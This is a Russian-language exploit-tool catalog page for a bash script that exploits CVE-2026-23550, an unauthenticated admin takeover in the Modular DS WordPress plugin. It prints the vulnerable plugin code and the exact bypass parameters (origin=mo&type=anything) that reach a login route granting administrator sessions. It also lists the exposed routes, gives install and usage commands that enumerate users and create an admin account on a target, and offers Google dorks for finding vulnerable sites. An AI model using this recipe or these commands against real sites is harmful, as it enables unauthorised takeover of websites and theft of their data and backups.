Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-23550 — Bash-скрипт для перечисления пользователей WordPress и автоматического создания учётной записи администратора, использующий CVE-2026-23550 для обхода аутентификации и получения несанкционированного доступа к администратору. | Kitploit
Инструменты/GitHubGitHub/dedsecteam-blackhat/cve-2026-23550
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubdedsecteam-blackhat/cve-2026-23550

CVE-2026-23550

Bash-скрипт для перечисления пользователей WordPress и автоматического создания учётной записи администратора, использующий CVE-2026-23550 для обхода аутентификации и получения несанкционированного доступа к администратору.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
16 месяцев назадЕщё не проверено

CVE-2026-23550

Modular DS <=2.5.1 - Неавторизованный захват администратора

CVE ID: CVE-2026-23550 CVSS Score: 10.0 (CRITICAL) Затронутый плагин: Modular DS WordPress Plugin Затронутые версии: Все версии до 2.5.1 включительно Исправленная версия: 2.5.2 (выпущена 14 января 2026 г.) Активная эксплуатация: Подтверждена в дикой природе с 13 января 2026 г.

Этот плагин раскрывает свои API-маршруты под префиксом /api/modular-connector/. Эти маршруты сгруппированы за промежуточным ПО аутентификации в RouteServiceProvider.php. Однако аутентификацию можно обойти, используя ошибочный метод isDirectRequest().

Уязвимый код из HttpUtils.php:

root@kitploit:~
public static function isDirectRequest(): bool
{
    $request = \Modular\ConnectorDependencies\app('request');
    $userAgent = $request->header('User-Agent');
    $userAgentMatches = $userAgent && Str::is('ModularConnector/* (Linux)', $userAgent);
    $originQuery = $request->has('origin') && $request->get('origin') === 'mo';
    $isFromQuery = ($originQuery || $userAgentMatches) && $request->has('type');
    
    // When is wp-load.php request
    if ($isFromQuery) {
        return \true;
    }
    
    return \false;
}

Способ обхода очень прост: достаточно включить параметры origin=mo&type=anything в запрос. Никакой проверки подписи, секрета, IP или обязательного User-Agent – этих параметров уже достаточно, чтобы запрос считался Modular direct request

После того как запрос считается "direct", промежуточное ПО аутентификации в ModularGuard.php проверяет только, подключен ли сайт к Modular через validateOrRenewAccessToken(). Нет никакой криптографической связи между входящим запросом и самим Modular.

Открытые маршруты При успешном обходе аутентификации злоумышленник может получить доступ к:

root@kitploit:~
/login/{modular_request} – удаленный вход (доступ администратора)

/server-information – чувствительные данные системы

/users/{modular_request} – перечисление пользователей

/backup/* – резервные копии сайта

/cache/clear – очистка кэша

/manager/* – функции управления

/woocommerce/{modular_request} – статистика WooCommerce

Наиболее критичный маршрут входа

root@kitploit:~
public function getLogin(SiteRequest $modularRequest)
{
    $user = data_get($modularRequest->body, 'id');

    if (!empty($user)) {
        $user = get_user_by('id', $user);
    }

    if (empty($user)) {
        Cache::driver('wordpress')->forget('user.login');
        $user = ServerSetup::getAdminUser();  // FALLBACK KE ADMIN MANAPUN
    } else {
        Cache::driver('wordpress')->forever('user.login', $user->ID);
    }

    if (empty($user)) {
        throw new \Exception('No admin user detected.');
    }

    $cookies = ServerSetup::loginAs($user, true);  // AUTO-LOGIN

    return Response::redirectTo(admin_url('index.php'))
        ->withCookies($cookies);
}

Если в теле запроса нет ID пользователя, код найдет любого существующего администратора (getAdminUser()) и сразу выполнит вход.

Автор: (Dedsec Team)
Описание: Мощный bash-скрипт для перечисления пользователей WordPress и автоматического создания учетной записи администратора. Создан только для образовательных целей и авторизованного тестирования безопасности.

🚀 Возможности

  • Перечисление пользователей – Обнаруживает имена пользователей WordPress, перебирая ID авторов (/?author=1, /?author=2 и т.д.)
  • Отображение Google dork – Показывает полезные Google dork для поиска уязвимых сайтов WordPress (необязательно)
  • Режим эксплуатации – Пытается создать нового административного пользователя на цели (требуется уязвимый плагин/тема или конкретный CVE)
  • Чистый вывод – Цветная консольная обратная связь для удобного чтения

📦 Требования

  • Bash 4+
  • curl (для HTTP-запросов)
  • base64 (если вы используете обфусцированную версию, хе-хе)

🔧 Установка

root@kitploit:~
git clone https://github.com/DedsecTeam-BlackHat/CVE-2026-23550.git
cd CVE-2026-23550
chmod +x CVE-2026-23550.sh

Использование

root@kitploit:~
./CVE-2026-23550.sh [options] <target_url>
  1. Перечислить пользователей на цели ./CVE-2026-23550.sh -e -t http://targetsite.com
  2. Перечислить пользователей и затем создать администратора ./CVE-2026-23550.sh -t http://targetsite.com -c -u dedsec_admin -p P@ssw0rd!
  3. Просто показать Google dork ./CVE-2026-23550.sh -d
Скачать инструмент